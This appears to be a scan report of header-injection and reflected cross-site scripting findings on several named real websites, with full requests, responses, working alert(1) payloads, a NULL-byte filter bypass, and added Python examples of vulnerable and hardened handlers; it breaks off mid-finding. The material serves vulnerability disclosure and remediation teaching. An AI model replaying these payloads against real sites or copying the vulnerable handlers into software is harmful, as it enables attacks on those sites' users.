HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
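
As an added illustration of the defect and the remediation above (example code written for this report, not the ad server's own handler), the following Python models a redirect handler that copies the first URL path segment into the Location header, exactly the copy described in findings 1.1 and 1.2. The redirect base is taken from the captured Location header; the handler itself, the response shape and the payload (the scanner's CR LF marker followed by a Set-Cookie line so the effect is visible) are assumptions constructed for the example. The hardened version applies the allow-list the remediation text describes.

```python
from urllib.parse import unquote

# Redirect base taken from the captured Location header in findings 1.1 and 1.2.
REDIRECT_BASE = "http://static.2mdn.net/"

# Constructed payload in the shape of the scanner's 1ec36%0d%0aee4caf17b88: the
# same CR LF trick, followed by a header name so the injected header is visible.
INJECT_PAYLOAD = "1ec36%0d%0aSet-Cookie:%20id=attacker"


def _response(location: str) -> bytes:
    """Serialise a 302 the way a naive handler would: string concatenation,
    with no checks on what ends up in the header line."""
    head = (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        "Content-Type: text/html\r\n"
        f"Location: {location}\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + b"<h1>Error 302 Moved Temporarily</h1>"


def redirect_vulnerable(first_segment: str) -> bytes:
    """Assumed vulnerable handler: URL-decode the first path segment and copy it
    into Location. CR LF inside the decoded value terminates the header early,
    so whatever follows becomes a new header line (CWE-113)."""
    return _response(REDIRECT_BASE + unquote(first_segment))


def safe_segment(first_segment: str) -> str:
    """Allow-list validation as the remediation text recommends: short, and
    only characters that can never end or start a header line. The check runs
    on the decoded value; checking before decoding would let %0d%0a through."""
    decoded = unquote(first_segment)
    if not 0 < len(decoded) <= 64:
        raise ValueError("segment length out of range")
    for ch in decoded:
        # Anything below 0x20 (CR, LF, NUL, ...) or DEL is never legitimate here.
        if ord(ch) < 0x20 or ord(ch) == 0x7F:
            raise ValueError("control character in segment")
        if not (ch.isascii() and (ch.isalnum() or ch in "._-")):
            raise ValueError(f"disallowed character {ch!r} in segment")
    return decoded


def is_safe_segment(first_segment: str) -> bool:
    """Boolean gate around safe_segment(), for callers that prefer not to catch."""
    try:
        safe_segment(first_segment)
        return True
    except ValueError:
        return False


def redirect_hardened(first_segment: str) -> bytes:
    """Same handler with the segment validated before it reaches the header."""
    return _response(REDIRECT_BASE + safe_segment(first_segment))


def header_names(raw: bytes) -> list:
    """Parse the header block of a raw response and return the header names in
    order; this is what a client (or an intermediate proxy cache) would see."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")[1:]  # drop the status line
    return [line.partition(b":")[0].decode("latin-1") for line in lines]


if __name__ == "__main__":
    print(header_names(redirect_vulnerable(INJECT_PAYLOAD)))
    # ['Content-Type', 'Location', 'Set-Cookie']  <- header the app never set
    print(is_safe_segment(INJECT_PAYLOAD), is_safe_segment("ad"))
    print(header_names(redirect_hardened("ad")))
```

Running the file prints the header names a client would parse from each response; the vulnerable handler yields a third header, Set-Cookie, that the application never set, while the hardened handler refuses the segment before any response is built.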


1.1. http://ad.doubleclick.net/ad/N4390.no_url_specifiedOX2495/B4882317.27 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4390.no_url_specifiedOX2495/B4882317.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ec36%0d%0aee4caf17b88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ec36%0d%0aee4caf17b88/N4390.no_url_specifiedOX2495/B4882317.27 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ec36
ee4caf17b88
/N4390.no_url_specifiedOX2495/B4882317.27:
Date: Sat, 11 Dec 2010 17:58:38 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adj/N5811.6393.MYSPACE/B5015899 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5811.6393.MYSPACE/B5015899

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 71417%0d%0a24e536cd9bc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /71417%0d%0a24e536cd9bc/N5811.6393.MYSPACE/B5015899;sz=300x250;click=http://demr.opt.fimserve.com/lnk/?ek=ACG08K6QAu-50ciAUFyu_g1vWRK6xCufeZRioGttipdpYIHhIo1Tmf-eAjPrq7qr8WSGmgZemaJVJcp1KTVV_GnIwIO3mcXAJHjXkvmqllx0JS5NB2zFE5u-R3oFsOsuu4gJ75KaWoQNK-CXPm2PoM7PcWgcny9V1viFVFjcJOjXnHwyusqsueyd0b3CHolEGMBY1V5Qn-rDwX4Z22CB5u1F7t9VUi55J1JTxHBTOb19yLgi32VSspuMsiu6GLXSFiFdBXWfllZ6v6Kl6uLimt6xLBZZR59aJJzQxuAO1qoIpa1OD3L6R1PDXzRcLE0Cpghref=;ord=1292087967885? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=963501277&nwvert=2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/71417
24e536cd9bc
/N5811.6393.MYSPACE/B5015899;sz=300x250;click=http: //demr.opt.fimserve.com/lnk/
Date: Sat, 11 Dec 2010 17:49:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)
There are 351 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (for example, numeric parameters such as minAge and maxAge should accept only digits); and user input should be encoded at every point where it is copied into application responses, using the encoding appropriate to the context in which it appears (HTML text, an HTML attribute value or a JavaScript string). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
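
To make the output-encoding layer concrete, here is an added Python example (not code from any of the applications listed, and not from the scanner) covering the three contexts that recur in the findings below: an attribute value in double quotes (2.1, 2.4, 2.5, 2.13, 2.14), text between tags (2.2, 2.3, 2.8 to 2.11) and a JavaScript string in double quotes (2.6, 2.7, 2.12). The payloads are copied from those findings; the surrounding markup is assumed. It also reproduces the backslash-before-quote escaping visible in finding 2.4, which is a JavaScript-string escape and does nothing in an HTML attribute.

```python
import html
import json

# Payloads copied from the findings in this report; the markup around them is
# an assumption for the example.
ATTR_PAYLOAD = 'a146b"><script>alert(1)</script>c78c2ed554b'   # finding 2.4
TEXT_PAYLOAD = "3ed32<img src=a onerror=alert(1)>d81d4c9e66"   # finding 2.8
JS_PAYLOAD = '73a62";alert(1)//831b24e6265'                     # finding 2.12


def render_attr_backslash(value: str) -> str:
    """The escaping seen in finding 2.4: a backslash before each quote.
    HTML has no backslash escape, so the attribute still closes at the quote
    and the <script> element that follows is live markup."""
    escaped = value.replace('"', '\\"')
    return f'<form action="{escaped}" method="post">'


def render_attr(value: str) -> str:
    """Attribute context: HTML-encode with quotes included (html.escape does
    both by default), so the value can never terminate the attribute."""
    return f'<form action="{html.escape(value, quote=True)}" method="post">'


def render_text(value: str) -> str:
    """Text between tags: HTML-encode so < and > cannot open a tag."""
    return f"<h1>{html.escape(value)}</h1>"


def js_string_literal(value: str) -> str:
    """JavaScript string context: JSON-encode, which yields a valid JS string
    literal with quotes and control characters escaped, then also escape '<'
    so a literal </script> inside the value cannot end the script element."""
    return json.dumps(value).replace("<", "\\u003c")


def render_js_string(value: str) -> str:
    """The pattern from findings 2.6/2.7, with the value encoded as a string
    literal instead of pasted between the quotes."""
    return f"<script>var strQryValus={js_string_literal(value)};</script>"


def contains_live_markup(fragment: str) -> bool:
    """Check used below: does the rendered fragment still contain an unencoded
    tag start from one of the payloads above?"""
    lowered = fragment.lower()
    return "<script>alert" in lowered or "<img " in lowered


if __name__ == "__main__":
    print(render_attr_backslash(ATTR_PAYLOAD))  # still contains <script>alert(1)
    print(render_attr(ATTR_PAYLOAD))
    print(render_text(TEXT_PAYLOAD))
    print(render_js_string(JS_PAYLOAD))
    print(render_js_string("</script><script>alert(1)</script>"))
```

The point of js_string_literal is that a JavaScript string and an HTML attribute need different encoders: the backslash that protects a string literal is meaningless to the HTML parser, and HTML entities written into a string literal reach the script as entity text, not as the decoded character.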


2.1. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5b51"><script>alert(1)</script>7a67c21e36c was submitted in the REST URL parameter 1. This input was echoed as b5b51"><script>alert(1)</script>7a67c21e36c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
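
The NULL-byte bypass described here (the same remediation note applies to findings 2.2 and 2.5) is easy to reproduce. The following added Python example, not taken from the report or from the site, emulates a filter that URL-decodes and then scans a C string, so it stops at the first NUL, alongside a length-aware filter that rejects NUL outright. The request path is the one from this finding; the echoing behaviour is modelled on the 404 page shown below, where the application writes the still-encoded request URI into an href. The filter logic and the blocked-token list are assumptions.

```python
from html import escape
from urllib.parse import unquote_to_bytes

# Request path from finding 2.1, still URL-encoded as the server received it;
# %00 is the NUL the scanner prepends to the blocked characters.
RAW_URI = '/weblog%00b5b51"><script>alert(1)</script>7a67c21e36c/2006/03/base/'

# Assumed deny-list of the emulated filter.
BLOCKED = (b"<script", b"onerror=", b"javascript:")


def native_filter_allows(raw_uri: str) -> bool:
    """Emulates a filter written against C strings: URL-decode, then scan up
    to the first NUL, because that is where a C string ends. Everything after
    %00 is invisible to it."""
    decoded = unquote_to_bytes(raw_uri)
    visible = decoded.split(b"\x00", 1)[0]
    return not any(tok in visible.lower() for tok in BLOCKED)


def length_aware_filter_allows(raw_uri: str) -> bool:
    """Same check over the full buffer, with NUL itself rejected outright: it
    has no legitimate place in a URL path or parameter."""
    decoded = unquote_to_bytes(raw_uri)
    if b"\x00" in decoded:
        return False
    return not any(tok in decoded.lower() for tok in BLOCKED)


def app_echo_vulnerable(raw_uri: str) -> str:
    """Models the 404 page in finding 2.1: the application copies the raw
    request URI into an href without encoding. It never stopped at the NUL,
    so the filter and the application disagree about what the input was."""
    return f'<a href="{raw_uri}">'


def app_echo_fixed(raw_uri: str) -> str:
    """The actual fix: encode at the output point, independent of any filter."""
    return f'<a href="{escape(raw_uri, quote=True)}">'


if __name__ == "__main__":
    print("native filter allows:", native_filter_allows(RAW_URI))          # True
    print("length-aware allows:", length_aware_filter_allows(RAW_URI))      # False
    print(app_echo_vulnerable(RAW_URI))
    print(app_echo_fixed(RAW_URI))
```

The mismatch is the lesson: the filter reasons about a decoded, NUL-terminated view of the input, while the application reasons about the whole, still-encoded string. Any filter placed in front of an application should be fed the representation the application will actually use, and the output encoding must be present regardless.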

Request

GET /weblog%00b5b51"><script>alert(1)</script>7a67c21e36c/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:03:44 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00b5b51"><script>alert(1)</script>7a67c21e36c/2006/">
...[SNIP]...

2.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00bbe77<a>2359e70d7a6 was submitted in the REST URL parameter 1. This input was echoed as bbe77<a>2359e70d7a6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00bbe77<a>2359e70d7a6/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:03:45 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>2359e70d7a6/">weblog%00bbe77<a>2359e70d7a6</a>
...[SNIP]...

2.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 566c2<a>e6fcc6b2e57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base566c2<a>e6fcc6b2e57/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:04:23 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 11 Dec 2010 18:04:23 GMT
Last-Modified: Sat, 11 Dec 2010 18:04:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base566c2<a>e6fcc6b2e57/</h1>
...[SNIP]...

2.4. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a146b"><script>alert(1)</script>c78c2ed554b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a146b\"><script>alert(1)</script>c78c2ed554b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?a146b"><script>alert(1)</script>c78c2ed554b=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:03:02 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Sat, 11 Dec 2010 18:03:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 173973

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?a146b\"><script>alert(1)</script>c78c2ed554b=1#preview" method="post">
...[SNIP]...

2.5. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008d248"><script>alert(1)</script>a888f0f5543 was submitted in the REST URL parameter 1. This input was echoed as 8d248"><script>alert(1)</script>a888f0f5543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%008d248"><script>alert(1)</script>a888f0f5543 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 17:59:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Mon, 10-Jan-2011 17:59:21 GMT; path=/; domain=digg.com
Set-Cookie: d=81fc95189dccf51aa2fa5c680368e702008d457e5e85e02ae8b330c98fa0f463; expires=Fri, 11-Dec-2020 04:07:01 GMT; path=/; domain=.digg.com
X-Digg-Time: D=248985 10.2.128.108
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15297

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%008d248"><script>alert(1)</script>a888f0f5543.rss">
...[SNIP]...

2.6. http://events.nrf.com/annual2010/public/MainHall.aspx [exp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nrf.com
Path:   /annual2010/public/MainHall.aspx

Issue detail

The value of the exp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e996f"-alert(1)-"57ce3775cd6 was submitted in the exp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /annual2010/public/MainHall.aspx?ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6 HTTP/1.1
Host: events.nrf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 18:07:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b1hztn55j3hxyw454pesxjve; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30636


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n
...[SNIP]...
the full path from the qurystring.
                   strFullPath="/annual2010/public/MainHall.aspx";
                   
                   //Get only querystring
                   strQryValus="ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6";
                   arrstrFullPath=strFullPath.split("/");
                   
                   //Commented By Tulsi on 170062005
                   //strfileName=arrstrFullPath[5];
                   //Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length-1
...[SNIP]...

2.7. http://events.nrf.com/annual2010/public/MainHall.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nrf.com
Path:   /annual2010/public/MainHall.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79b66"-alert(1)-"e35552360be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /annual2010/public/MainHall.aspx?79b66"-alert(1)-"e35552360be=1 HTTP/1.1
Host: events.nrf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 17:59:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iuh00mfdl5xuqg452jimav45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30444


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n
...[SNIP]...
r strLang1="";
                   var strLang2="";
                   
                   //Get the full path from the qurystring.
                   strFullPath="/annual2010/public/MainHall.aspx";
                   
                   //Get only querystring
                   strQryValus="79b66"-alert(1)-"e35552360be=1";
                   arrstrFullPath=strFullPath.split("/");
                   
                   //Commented By Tulsi on 170062005
                   //strfileName=arrstrFullPath[5];
                   //Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length
...[SNIP]...

2.8. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://googleonline.webex.com
Path:   /ec0605lb/eventcenter/recording/recordAction.do

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66 was submitted in the REST URL parameter 1. This input was echoed as 3ed32<img src=a onerror=alert(1)>d81d4c9e66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ec0605lb3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66/eventcenter/recording/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:23 GMT
Server: Apache
Content-Length: 114
Set-Cookie: JSESSIONID=bMqHND8XhR6xdC4Z7g07qXWGR9RbyzJNtDmDxyygJDBvrZX2yQKb!-2086176403; path=/
Connection: close
Content-Type: text/html

Invalid path /ec0605lb3ed32<img src=a onerror=alert(1)>d81d4c9e66/eventcenter/recording/recordAction was requested

2.9. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://googleonline.webex.com
Path:   /ec0605lb/eventcenter/recording/recordAction.do

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9 was submitted in the REST URL parameter 2. This input was echoed as 9d92c<img src=a onerror=alert(1)>b4c765c70c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ec0605lb/eventcenter9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9/recording/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:27 GMT
Server: Apache
Content-Length: 106
Set-Cookie: JSESSIONID=L6BFND8bBTYMxXwwjl1kCft6FRJKL9qcdq6VlGt8nTDF4DP39wf6!1267178989; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html

Invalid path /eventcenter9d92c<img src=a onerror=alert(1)>b4c765c70c9/recording/recordAction was requested

2.10. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://googleonline.webex.com
Path:   /ec0605lb/eventcenter/recording/recordAction.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19 was submitted in the REST URL parameter 3. This input was echoed as 3e04b<img src=a onerror=alert(1)>edd90b20f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ec0605lb/eventcenter/recording3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
